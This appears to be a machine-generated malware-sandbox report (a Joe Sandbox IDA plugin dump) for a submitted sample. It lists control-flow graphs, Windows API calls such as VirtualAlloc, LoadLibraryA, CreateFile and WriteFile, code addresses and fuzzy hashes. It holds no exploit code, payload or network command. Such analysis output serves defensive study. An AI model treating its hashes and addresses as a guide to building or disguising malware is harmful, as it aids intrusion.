                                                    control_flow_graph 321 407749-40774a 322 4076dc-4076e6 WriteFile 321->322 323 40774c-40776f 321->323 325 4076e8-4076ea call 40748c 322->325 326 4076ef-4076f2 322->326 324 407770-407785 323->324 327 407787 324->327 328 4077f9 324->328 325->326 330 407700-407704 326->330 331 4076f4-4076fb call 4073ec 326->331 332 40778a-40778f 327->332 333 4077fd-407802 327->333 334 40783b-40783d 328->334 335 4077fb 328->335 331->330 339 407803-407819 332->339 341 407791-407792 332->341 333->339 337 407841-407843 334->337 335->333 340 40785b-40785c 337->340 339->340 349 40781b 339->349 342 4078d6-4078eb call 407890 InterlockedExchange 340->342 343 40785e-40788c 340->343 344 407724-407741 341->344 345 407794-4077b4 341->345 366 407912-407917 342->366 367 4078ed-407910 342->367 360 407820-407823 343->360 361 407890-407893 343->361 348 4077b5 344->348 351 407743 344->351 345->348 353 4077b6-4077b7 348->353 354 4077f7-4077f8 348->354 355 40781e-40781f 349->355 357 407746-407747 351->357 358 4077b9 351->358 353->358 354->328 355->360 357->321 359 4077bb-4077cd 357->359 358->359 359->337 364 4077cf-4077d4 359->364 363 407898 360->363 365 407824 360->365 361->363 368 40789a 363->368 364->334 372 4077d6-4077de 364->372 365->368 370 407825 365->370 367->366 367->367 371 40789f 368->371 373 407896-407897 370->373 374 407826-40782d 370->374 375 4078a1 371->375 372->324 384 4077e0 372->384 373->363 374->375 377 40782f 374->377 381 4078a3 375->381 382 4078ac 375->382 379 407832-407833 377->379 380 4078a5-4078aa 377->380 379->334 379->355 383 4078ae-4078af 380->383 381->380 382->383 383->371 385 4078b1-4078bd 383->385 384->354 385->363 386 4078bf-4078c0 385->386
                                                    APIs
                                                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2919052063.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2919026745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919083809.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919110823.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: FileWrite
                                                    • String ID:
                                                    • API String ID: 3934441357-0
                                                    • Opcode ID: 2dcb34b7253c06e6037fe4e1c91b55c1fb8a74294a45886a788786d1cab60b08
                                                    • Instruction ID: ef7112967ca92329f6454244f41010afd6781152a6d2bd16d4b387d8db15cd6b
                                                    • Opcode Fuzzy Hash: 2dcb34b7253c06e6037fe4e1c91b55c1fb8a74294a45886a788786d1cab60b08
                                                    • Instruction Fuzzy Hash: F951D12294D2910FC7126B7849685A53FE0FE5331532E92FBC5C1AB1A3D27CA847D35B

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 387 406fa0-406ff3 SetErrorMode call 403414 LoadLibraryA
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00008000), ref: 00406FAA
                                                    • LoadLibraryA.KERNEL32(00000000,00000000,00406FF4,?,00000000,00407012,?,00008000), ref: 00406FD9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2919052063.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2919026745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919083809.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919110823.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: ErrorLibraryLoadMode
                                                    • String ID:
                                                    • API String ID: 2987862817-0
                                                    • Opcode ID: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                    • Instruction ID: 292e1fc4e19851716b0ab93d2d43454b233f1d25ff8a05a0d03104374ea2dcbc
                                                    • Opcode Fuzzy Hash: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                    • Instruction Fuzzy Hash: D6F08270A14704BEDB129FB68C5282ABBECEB4DB0475349BAF914A26D2E53C5C209568

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 397 40766c-407691 SetFilePointer 398 4076a3-4076a8 397->398 399 407693-40769a GetLastError 397->399 399->398 400 40769c-40769e call 40748c 399->400 400->398
                                                    APIs
                                                    • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 0040768B
                                                    • GetLastError.KERNEL32(?,?,?,00000000), ref: 00407693
                                                      • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020E03AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2919052063.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2919026745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919083809.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919110823.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$FilePointer
                                                    • String ID:
                                                    • API String ID: 1156039329-0
                                                    • Opcode ID: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                    • Instruction ID: 64daf3b7b2b4cd691f255a674f922558070816022eb0a012369b73df1192a31e
                                                    • Opcode Fuzzy Hash: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                    • Instruction Fuzzy Hash: B2E092766081016FD600D55EC881B9B37DCDFC5364F104536B654EB2D1D679EC108776

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 391 40762c-40764a ReadFile 392 407663-40766a 391->392 393 40764c-407650 391->393 394 407652-40765a GetLastError 393->394 395 40765c-40765e call 40748c 393->395 394->392 394->395 395->392
                                                    APIs
                                                    • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00407643
                                                    • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00407652
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2919052063.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2919026745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919083809.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919110823.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileLastRead
                                                    • String ID:
                                                    • API String ID: 1948546556-0
                                                    • Opcode ID: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                    • Instruction ID: e2f452503b48da12a69c10a9d1416f2aa512a4714c212e67fea7d8588799396e
                                                    • Opcode Fuzzy Hash: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                    • Instruction Fuzzy Hash: 69E012A1A081106ADB24A66E9CC5F6B6BDCCBC5724F14457BF504DB382D678DC0487BB

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 402 4075c4-4075e5 SetFilePointer 403 4075f7-4075f9 402->403 404 4075e7-4075ee GetLastError 402->404 404->403 405 4075f0-4075f2 call 40748c 404->405 405->403
                                                    APIs
                                                    • SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 004075DB
                                                    • GetLastError.KERNEL32(?,00000000,?,00000001), ref: 004075E7
                                                      • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020E03AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2919052063.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2919026745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919083809.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919110823.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$FilePointer
                                                    • String ID:
                                                    • API String ID: 1156039329-0
                                                    • Opcode ID: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                    • Instruction ID: 74cf86129294d2faf5969c20f66175129728110ffa3c668ef2bae8a95e28f18b
                                                    • Opcode Fuzzy Hash: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                    • Instruction Fuzzy Hash: C4E04FB1600210AFDB10EEB98D81B9676D89F48364F0485B6EA14DF2C6D274DC00C766
                                                    APIs
                                                    • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2919052063.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2919026745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919083809.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919110823.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Virtual$AllocFree
                                                    • String ID:
                                                    • API String ID: 2087232378-0
                                                    • Opcode ID: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                    • Instruction ID: 29306f1da17679ce7d7d3cecb65679b0075e6f6f2ddca0a826851c871ac90975
                                                    • Opcode Fuzzy Hash: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                    • Instruction Fuzzy Hash: 57F02772B0032057DB206A6A0CC1B636AC59F85B90F1541BBFA4CFF3F9D2B98C0042A9
                                                    APIs
                                                    • GetSystemDefaultLCID.KERNEL32(00000000,004053A6), ref: 0040528F
                                                      • Part of subcall function 00404CCC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404CE9
                                                      • Part of subcall function 004051FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2919052063.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2919026745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919083809.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919110823.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: DefaultInfoLoadLocaleStringSystem
                                                    • String ID:
                                                    • API String ID: 1658689577-0
                                                    • Opcode ID: b3b1cc4509b278e8422c820c611847d06614f75bfee0a937bc817707f8d770d6
                                                    • Instruction ID: 2407abf821673f044c2d0b48b7a4a38d2d1f2757cafa01d062fe92b1f2c090cc
                                                    • Opcode Fuzzy Hash: b3b1cc4509b278e8422c820c611847d06614f75bfee0a937bc817707f8d770d6
                                                    • Instruction Fuzzy Hash: 73314D75E0010AABCB00DF95C8C19EEB379FF84304F158977E815BB285E739AE059B98
                                                    APIs
                                                    • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2919052063.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2919026745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919083809.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919110823.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                    • Instruction ID: d860c9bcffbd3325f9178b4d72e9b59b5a3ff3896166b15a891a1a6cde46a7a7
                                                    • Opcode Fuzzy Hash: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                    • Instruction Fuzzy Hash: 6EE06D713442082EE3409AEC6C51FA277DCD309354F008032B988DB342D5719D108BE8
                                                    APIs
                                                    • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2919052063.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2919026745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919083809.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919110823.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                    • Instruction ID: d44512077142226ebef1615cfdb59f208ea4aebd3ed4d24446e2b73eb7949d4a
                                                    • Opcode Fuzzy Hash: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                    • Instruction Fuzzy Hash: A7E06D713442082ED2409AEC6C51F92779C9309354F008022B988DB342D5719D108BE8
                                                    APIs
                                                    • GetFileAttributesA.KERNEL32(00000000,00000000,00406A24,?,?,?,?,00000000,?,00406A39,00406D67,00000000,00406DAC,?,?,?), ref: 00406A07
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2919052063.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2919026745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919083809.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919110823.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0
                                                    • Opcode ID: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                    • Instruction ID: ccd219c895c276d3a4f2ed408fb3af00451e62210c6f1137e8185e88dac79a2a
                                                    • Opcode Fuzzy Hash: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                    • Instruction Fuzzy Hash: A0E0ED30300304BBD301FBA6CC42E4ABBECDB8A708BA28476B400B2682D6786E108428
                                                    APIs
                                                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                      • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020E03AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2919052063.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2919026745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919083809.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919110823.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileLastWrite
                                                    • String ID:
                                                    • API String ID: 442123175-0
                                                    • Opcode ID: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                    • Instruction ID: d11fc940c1eb4d9ab9bd5ee1403c634941755763b259216c6d34bff68e3e8731
                                                    • Opcode Fuzzy Hash: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                    • Instruction Fuzzy Hash: 6DE0ED766081106BD710A65AD880EAB67DCDFC5764F00407BF904DB291D574AC049676
                                                    APIs
                                                    • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00409127,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 004072A3
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2919052063.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2919026745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919083809.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919110823.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: FormatMessage
                                                    • String ID:
                                                    • API String ID: 1306739567-0
                                                    • Opcode ID: 2dc6ecac2658c0303fbeb732946dba8a31d4bcf901e7642ce2bff6997528785c
                                                    • Instruction ID: 7b38442d06f496379890204edef453c821f476d6c52b93f329ea0e63e965d40b
                                                    • Opcode Fuzzy Hash: 2dc6ecac2658c0303fbeb732946dba8a31d4bcf901e7642ce2bff6997528785c
                                                    • Instruction Fuzzy Hash: 17E0D8A0B8830136F22414544C87B77220E47C0700F10807E7700ED3C6D6BEA906815F
                                                    APIs
                                                    • SetEndOfFile.KERNEL32(?,020F7FF4,0040A08C,00000000), ref: 004076B3
                                                      • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020E03AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2919052063.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2919026745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919083809.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919110823.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileLast
                                                    • String ID:
                                                    • API String ID: 734332943-0
                                                    • Opcode ID: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                    • Instruction ID: f788b2e916ece263959a2b362e6cc5638f15ca068e5e6b6e193a7bb405067b9b
                                                    • Opcode Fuzzy Hash: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                    • Instruction Fuzzy Hash: BEC04CA1A1410047CB40A6BE89C1A1666D85A4821530485B6B908DB297D679E8004666
                                                    APIs
                                                    • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2919052063.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2919026745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919083809.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919110823.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    • Opcode ID: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                    • Instruction ID: c47f2f618e2971e07f5b1abb1c43dc6c143ad8b034d1ddbdae76011a93498253
                                                    • Opcode Fuzzy Hash: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                    • Instruction Fuzzy Hash: 54B09B76A1C2415DE705DAD5745153863D4D7C47143A14977F104D35C0D53DA4144519
                                                    APIs
                                                    • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2919052063.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2919026745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919083809.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919110823.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    • Opcode ID: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                    • Instruction ID: a55afa0689d716a84ca499c05243e055e04a08b2ab071a0afeb25d409e08decd
                                                    • Opcode Fuzzy Hash: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                    • Instruction Fuzzy Hash: FFA022A8C08000B2CE00E2E08080A3C23283A88308BC08BA2320CB20C0C03CE008020B
                                                    APIs
                                                    • CharPrevA.USER32(?,?,0040696C,?,00406649,?,?,00406D87,00000000,00406DAC,?,?,?,?,00000000,00000000), ref: 00406972
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2919052063.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2919026745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919083809.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919110823.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: CharPrev
                                                    • String ID:
                                                    • API String ID: 122130370-0
                                                    • Opcode ID: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                    • Instruction ID: 57bb655d476c0b104ac503b4dc16dcc9cc7d9309af7e6782790f501f1b0aeff9
                                                    • Opcode Fuzzy Hash: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                    • Instruction Fuzzy Hash:
                                                    APIs
                                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407FA0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2919052063.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2919026745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919083809.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919110823.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: f3d8bc7867bd0b1d1bf8a1a21c6b81e8059d467c94b9dab864cb1ccd8d8ada4e
                                                    • Instruction ID: 20a67eb23ea55951ef5110b519d4bcc97d420124264edb02c1094051c82f9398
                                                    • Opcode Fuzzy Hash: f3d8bc7867bd0b1d1bf8a1a21c6b81e8059d467c94b9dab864cb1ccd8d8ada4e
                                                    • Instruction Fuzzy Hash: D2117571A042059BDB00EF19C881B5B7794AF44359F05807EF958AB3C6DB38EC00CBAA
                                                    APIs
                                                    • VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2919052063.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2919026745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919083809.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919110823.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: FreeVirtual
                                                    • String ID:
                                                    • API String ID: 1263568516-0
                                                    • Opcode ID: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                    • Instruction ID: 63c8255cdd02620dd55efc6405714c3c0a63becca9b218cdeda95617091702f1
                                                    • Opcode Fuzzy Hash: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                    • Instruction Fuzzy Hash: 3601A7726442148BC310AF28DDC093A77D5EB85364F1A4A7ED985B73A1D23B6C0587A8
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2919052063.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2919026745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919083809.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919110823.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                    • Instruction ID: e7ddd8f09f86228f97b62737e097d00c20d119481f2284b048c56b7aa048eabb
                                                    • Opcode Fuzzy Hash: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                    • Instruction Fuzzy Hash: 41D05E82B00A6017D615F2BE4D8869692D85F89685B08843AF654E77D1D67CEC00838D
                                                    APIs
                                                    • VirtualFree.KERNEL32(?,00000000,00008000,?,00407E9D), ref: 00407ECF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2919052063.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2919026745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919083809.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919110823.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: FreeVirtual
                                                    • String ID:
                                                    • API String ID: 1263568516-0
